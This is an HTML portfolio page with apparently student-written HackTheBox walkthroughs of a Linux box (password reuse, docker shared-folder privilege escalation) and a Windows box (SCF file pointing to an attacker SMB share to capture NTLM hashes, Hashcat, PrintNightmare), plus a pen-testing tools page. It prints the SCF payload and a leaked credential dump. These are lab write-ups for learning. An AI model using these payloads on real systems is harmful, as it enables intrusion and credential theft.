          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
           <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
           user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
